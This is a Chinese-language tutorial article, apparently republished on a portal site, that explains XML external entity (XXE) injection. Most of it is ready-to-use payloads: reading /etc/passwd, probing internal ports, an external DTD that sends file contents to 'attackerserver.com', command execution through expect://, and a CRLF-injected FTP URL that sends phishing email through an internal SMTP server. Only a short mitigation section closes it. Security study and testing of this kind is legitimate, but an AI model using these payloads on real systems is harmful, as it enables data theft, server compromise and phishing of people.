您好,欢迎访问一九零五行业门户网

从XML到远程代码执行的方法是什么

什么是xxe简单来说,xxe就是xml外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。
例如,如果你当前使用的程序为php,则可以将libxml_disable_entity_loader设置为true来禁用外部实体,从而起到防御的目的。
基本利用通常攻击者会将payload注入xml文件中,一旦文件被执行,将会读取服务器上的本地文件,并对内网发起访问扫描内部网络端口。换而言之,xxe是一种从本地到达各种服务的方法。此外,在一定程度上这也可能帮助攻击者绕过防火墙规则过滤或身份验证检查。
以下是一个简单的xml代码post请求示例:
post /vulnerable http/1.1host: www.test.comuser-agent: mozilla/5.0 (windows nt 6.1; win64; x64; rv:57.0) gecko/20100101 firefox/57.0accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8accept-language: en-us,en;q=0.5referer: https://test.com/test.htmlcontent-type: application/xmlcontent-length: 294cookie: mycookie=cookies;connection: closeupgrade-insecure-requests: 1<?xml version="1.0"?><catalog>   <core id="test101">  <author>john, doe</author>  <title>i love xml</title>  <category>computers</category>  <price>9.99</price>  <date>2018-10-01</date>  <description>xml is the best!</description>   </core></catalog>
之后,上述代码将交由服务器的xml处理器解析。代码被解释并返回:{request successful: added!}
现在,当攻击者试图滥用xml代码解析时会发生什么?让我们编辑代码并包含我们的恶意payload:
<?xml version="1.0"?><!doctype gvi [<!entity xxe system "file:///etc/passwd" >]><catalog>   <core id="test101">  <author>john, doe</author>  <title>i love xml</title>  <category>computers</category>  <price>9.99</price>  <date>2018-10-01</date>  <description>&xxe;</description>   </core></catalog>
代码被解释并返回:
{error: no results for description root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/sync...
blind oob xxe如上例所示,服务器将/etc/passwd文件的内容作为响应返回给我们的xxe。但是在某些情况下,即便服务器可能存在xxe,也不会向攻击者的浏览器或代理返回任何响应。遇到这种情况,我们可以使用blind xxe漏洞来构建一条外带数据(oob)通道来读取数据。虽然我们无法直接查看文件内容,但我们仍然可以使用易受攻击的服务器作为代理,在外部网络上执行扫描以及代码。
场景1 - 端口扫描在第一个示例中,我们通过uri将请求指向了/etc/passwd文件,并最终成功的为我们返回了文件中的内容。除此之外,我们也可以使用http uri并强制服务器向我们指定的端点和端口发送get请求,将xxe转换为ssrf(服务器端请求伪造)。
以下代码将尝试与端口8080通信,根据响应时间/长度,攻击者将可以判断该端口是否已被开启。
<?xml version="1.0"?><!doctype gvi [<!entity xxe system "http://127.0.0.1:8080" >]><catalog>   <core id="test101">  <author>john, doe</author>  <title>i love xml</title>  <category>computers</category>  <price>9.99</price>  <date>2018-10-01</date>  <description>&xxe;</description>   </core></catalog>
场景2 - 通过dtd窃取文件外部文档类型定义(dtd)文件可被用于触发oob xxe。攻击者将.dtd文件托管在vps上,使远程易受攻击的服务器获取该文件并执行其中的恶意命令。
以下请求将被发送到应用程序以演示和测试该方法:
<?xml version="1.0"?><!doctype data system "http://attackerserver.com/xxe_file.dtd"><catalog>   <core id="test101">  <author>john, doe</author>  <title>i love xml</title>  <category>computers</category>  <price>9.99</price>  <date>2018-10-01</date>  <description>&xxe;</description>   </core></catalog>
上述代码一旦由易受攻击的服务器处理,就会向我们的远程服务器发送请求,查找包含我们的payload的dtd文件:
<!entity % file system "file:///etc/passwd"><!entity % all "<!entity xxe system 'http://attackeserver.com/?%file;'>>%all;
让我们花点时间了解上述请求的执行流程。结果是有两个请求被发送到了我们的服务器,第二个请求为/etc/passwd文件的内容。
在我们的vps日志中我们可以看到,带有文件内容的第二个请求,以此我们也确认了oob xxe漏洞的存在:
http://attackerserver.com/?daemon%3ax%3a1%3a1%3adaemon%3a%2fusr%2fsbin%3a%2fbin%2fsh%0abin%3ax%3a2%3a2%3abin%3a%2fbin%3a%2fbin%2fsh
场景3 - 远程代码执行这种情况很少发生,但有些情况下攻击者能够通过xxe执行代码,这主要是由于配置不当/开发内部应用导致的。如果我们足够幸运,并且php expect模块被加载到了易受攻击的系统或处理xml的内部应用程序上,那么我们就可以执行如下的命令:
<?xml version="1.0"?><!doctype gvi [ <!element foo any ><!entity xxe system "expect://id" >]><catalog>   <core id="test101">  <author>john, doe</author>  <title>i love xml</title>  <category>computers</category>  <price>9.99</price>  <date>2018-10-01</date>  <description>&xxe;</description>   </core></catalog>
响应:
{error: no results for description uid=0(root) gid=0(root) groups=0(root)...
场景4 - 钓鱼我们使用java的xml解析器找到了一个易受攻击的端点。扫描内部端口后,我们发现了一个侦听在25端口的smtp服务,java支持在sun.net.ftp.impl.ftpclient中的ftp uri。因此,我们可以指定用户名和密码,例如ftp://user:password@host:port/test.txt,ftp客户端将在连接中发送相应的user命令。
但是如果我们将%0d%0a (crlf)添加到url的user部分的任意位置,我们就可以终止user命令并向ftp会话中注入一个新的命令,即允许我们向25端口发送任意的smtp命令:
ftp://a%0d%0aehlo%20a%0d%0amail%20from%3a%3csupport%40vulnerablesystem.com%3e%0d%0arcpt%20to%3a%3cvictim%40gmail.com%3e%0d%0adata%0d%0afrom%3a%20support%40vulnerablesystem.com%0ato%3a%20victim%40gmail.com%0asubject%3a%20test%0a%0atest!%0a%0d%0a.%0d%0aquit%0d%0a:a@vulnerablesystem.com:25
当ftp客户端使用此url连接时,以下命令将会被发送给vulnerablesystem.com上的邮件服务器:
ftp://aehlo amail from: <support@vulnerablesystem.com>rcpt to: <victim@gmail.com>datafrom: support@vulnerablesystem.comto: victim@gmail.comsubject: reset your passwordwe need to confirm your identity. confirm your password here: http://phishing_url.com.quit:support@vulnerablesystem.com:25
这意味着攻击者可以从从受信任的来源发送钓鱼邮件(例如:帐户重置链接)并绕过垃圾邮件过滤器的检测。除了链接之外,甚至我们也可以发送附件。
实用工具能手动编辑web请求对于xxe攻击至关重要,这里我推荐大家使用burpsuite。burpsuite的扫描功能可以为我们检测潜在的xxe漏洞,其次burp的intruder功能非常适合用于端口探测。但要提醒的是工具只是我们的辅助,在某些情况下手动测试可能效果更好!
http请求分析工具像requestbin 和 hookbin 都非常适合oob xxe的测试。此外,burpsuite pro的collaborator也是个不错的选择,但一些安全研究人员他们更喜欢使用他们自己的vps。
缓解措施上面讨论的主要问题就是xml解析器解析了用户发送的不可信数据。然而,要去校验dtd(document type definition)中system标识符定义的数据,并不容易,也不大可能。大部分的xml解析器默认对于xxe攻击是脆弱的。因此,最好的解决办法就是配置xml处理器去使用本地静态的dtd,不允许xml中含有任何自己声明的dtd。
以上就是从xml到远程代码执行的方法是什么的详细内容。
其它类似信息

推荐信息